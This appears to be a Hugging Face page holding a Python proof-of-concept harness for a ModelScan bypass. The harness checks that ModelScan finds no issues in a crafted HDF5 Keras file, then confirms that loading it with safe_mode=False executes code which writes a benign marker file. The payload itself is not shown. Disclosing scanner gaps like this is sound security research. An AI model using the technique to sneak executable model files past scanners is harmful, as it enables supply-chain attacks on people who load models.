captainarp's picture
Add HDF5 TorchModuleWrapper ModelScan bypass PoC
f3aeec0 verified
Raw
History Blame Contribute Delete
2.73 kB
import argparse
import json
import pathlib
import sys
MARKER = pathlib.Path("h5_torch_wrapper_marker.txt")
MARKER_TEXT = "H5_TORCH_WRAPPER_BYPASS"
def run_modelscan(payload, json_out):
from modelscan.modelscan import ModelScan
scanner = ModelScan()
data = scanner.scan(payload)
json_out.write_text(json.dumps(data, indent=2))
summary = data.get("summary", {})
print("ModelScan version:", summary.get("modelscan_version"))
print("ModelScan total_scanned:", summary.get("scanned", {}).get("total_scanned"))
print("ModelScan issues:", summary.get("total_issues"))
print("ModelScan errors:", len(data.get("errors", [])))
return data
def check_keras_load(payload):
import keras
MARKER.unlink(missing_ok=True)
try:
keras.saving.load_model(payload, compile=False)
except Exception as exc:
print("safe_mode=True exception:", type(exc).__name__, str(exc)[:260])
safe_marker = MARKER.exists()
print("Marker after safe_mode=True:", safe_marker)
MARKER.unlink(missing_ok=True)
try:
keras.saving.load_model(payload, safe_mode=False, compile=False)
except Exception as exc:
print("safe_mode=False exception:", type(exc).__name__, str(exc)[:260])
unsafe_marker = MARKER.exists()
marker_text = MARKER.read_text() if unsafe_marker else ""
print("Marker after safe_mode=False:", unsafe_marker)
print("Marker contents:", marker_text)
return safe_marker, unsafe_marker, marker_text
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--payload",
default="poc_h5_torch_wrapper.h5",
help="Path to the HDF5 PoC file.",
)
parser.add_argument(
"--json-out",
default="modelscan_result_h5_torch_wrapper.json",
help="Where to write captured ModelScan JSON output.",
)
args = parser.parse_args()
payload = pathlib.Path(args.payload)
json_out = pathlib.Path(args.json_out)
data = run_modelscan(payload, json_out)
safe_marker, unsafe_marker, marker_text = check_keras_load(payload)
if data.get("summary", {}).get("total_issues") != 0:
raise SystemExit("Expected ModelScan to report 0 issues")
if data.get("errors"):
raise SystemExit("Expected ModelScan to report 0 errors")
if data.get("summary", {}).get("scanned", {}).get("total_scanned") != 1:
raise SystemExit("Expected ModelScan to scan the H5 file")
if safe_marker:
raise SystemExit("Expected default safe_mode=True to avoid marker")
if not unsafe_marker or marker_text != MARKER_TEXT:
raise SystemExit("Expected safe_mode=False load path to create marker")
if __name__ == "__main__":
main()